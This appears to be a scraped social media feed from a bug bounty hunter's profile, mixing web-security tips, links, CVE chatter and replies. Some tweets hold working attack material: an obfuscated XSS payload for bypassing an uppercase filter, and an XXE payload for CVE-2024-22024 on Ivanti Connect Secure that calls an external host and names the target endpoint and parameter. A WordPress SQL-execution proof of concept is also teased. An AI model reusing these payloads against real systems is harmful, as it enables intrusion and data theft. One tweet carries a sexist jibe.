I¯\_(ツ)_/¯I \ (•◡•) / @BountyOverflow
BBH ( ͡° ͜ʖ ͡°) 💰 @Bugcrowd Top 50 \o/ ✌️ MVP✌️ I am here to learn/share application security stuff ✌️ I enjoy finding auth bypass bugs 🐞 🌎 Earth 🌎 Joined December 2010-
Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability. Turns out it is super easy to exploit. Here is a basic PoC: Since "q" is passed directly into a $wpdb->get_results() call,…
XSS Tip: If alert() is being converted to ALERT() and you can use Like onerror=" 𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()" #xss
I ❤️ DNS I’ve spent 2 years full-time building nslookup.io. Now, I’m teaching everything I know in this course.
I wrote a primer on ffuf. danielmiessler.com/study/ffuf/ #infosec #webhacking
I am sharing biggest #BugBountytip today: You will never know unless you Try! #BugBounty
CVE-2024-22024, XXE on Ivanti Connect Secure, payload encoded base64: <?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi in the SAMLRequest param #bugbountytips #cve #Ivanti
Find Leaked Credentials Using Google Chrome dev Tools github.com/h4x0r-dz/Leake… Credit:@h4x0r_dz #bugbountytips #bugbounty
Ganglia Unauthenticated Dashboard P1 or P4? youtu.be/E2wPkcRRC6A Kudos to @RootxRavi for sharing his findings with us. #bugbounty #cybersecurity #infosec
@Masonhck3571 There you go github.com/majd/ipatool
@silentgh00st This is very similar to my Venmo attack. Cookies and old APIs: youtu.be/jvrFXe2yONM
Not many people know this, but if your site has an open redirect and client-side path traversal, you can steal the CSRF token header via a CORS request. That's why at LinkedIn I patched XHR.open a long time ago.
@G0LDEN_infosec @aszx87410 @terjanq @kevin_mizu @garethheyes are a good start. Gareth's book; the three others have a lot of posts on blogs etc. Things like this aszx87410.github.io/beyond-xss/en/
@TanmayLP7 some really great examples here: docs.google.com/presentation/d…
My findings are mostly: secondary context path traversals; API issues (mostly REST and GraphQL); reverse proxy misconfigurations, which led to a 0day that I had fun exploiting with @ArmanSameer95 and @codecancare across the internet; OAuth issues. Luckily, I found a 0 user…
Whats happening in India? Who will be the next PM?
Scan for [CVE-2023-49785] ChatGPT-Next-Web - SSRF/XSS (github.com/nvn1729) [critical] using @pdnuclei Nuclei Template : github.com/projectdiscove… #cve #nextchat #chatgpt #xss #ssrf #pdteam #hackwithutomation
@chybeta Damn man. I just want patience like you. Also for that many comments you deserve at least 3x bounty :)
@BountyOverflow I used ollama to host the command-r model, which has a better context length and is suitable for RAG. Planning to add all HackerOne and Medium articles related to bug bounty; hopefully it will suggest attack scenarios based on a Burp request. freecodecamp.org/news/mastering…
@ashu_barot @NASA awesome bro, now with that paper try to buy a hotdog xd @bxmbn
Burp crashes every hour? Are you a little girl or something? Can't you handle some pressure?
@BountyOverflow You will never know it's a Duplicate unless you Try! You will never know it's a Triager unless you Try!
📢 If you haven't heard by now, there's a new big security vulnerability: CVE-2024-3094 aka the libxz-utils backdoor. 😳 What's most shocking? The backdoor was introduced by none other than Jia Tan, a long-time maintainer of the XZ library. Per boehs.org/node/everythin… the…
I really appreciate the programs that triaged & paid me in a day/week. I rarely see such good & fast programs.
@cysky0x1 @Bugcrowd @RelentlessT7 Nobody can compete with Tal, including all bug bounty platforms. He's the fastest triager on Planet Earth. Also the kindest person 🫡
Here is a short writeup on how I managed to access 200k+ PII records by exploiting a simple vulnerability and accessing the admin dashboard! 📌Thread📌 1. I created an account as a simple user and one endpoint caught my attention (it was /api/v1/session)
@disclosedh1 I still find it bonkers that H1 triage has the power to say "nope, this isn't a bug!" and close reports for companies they don't work for. Imagine if X/Twitter didn't review this report. Not a good look for H1 triage.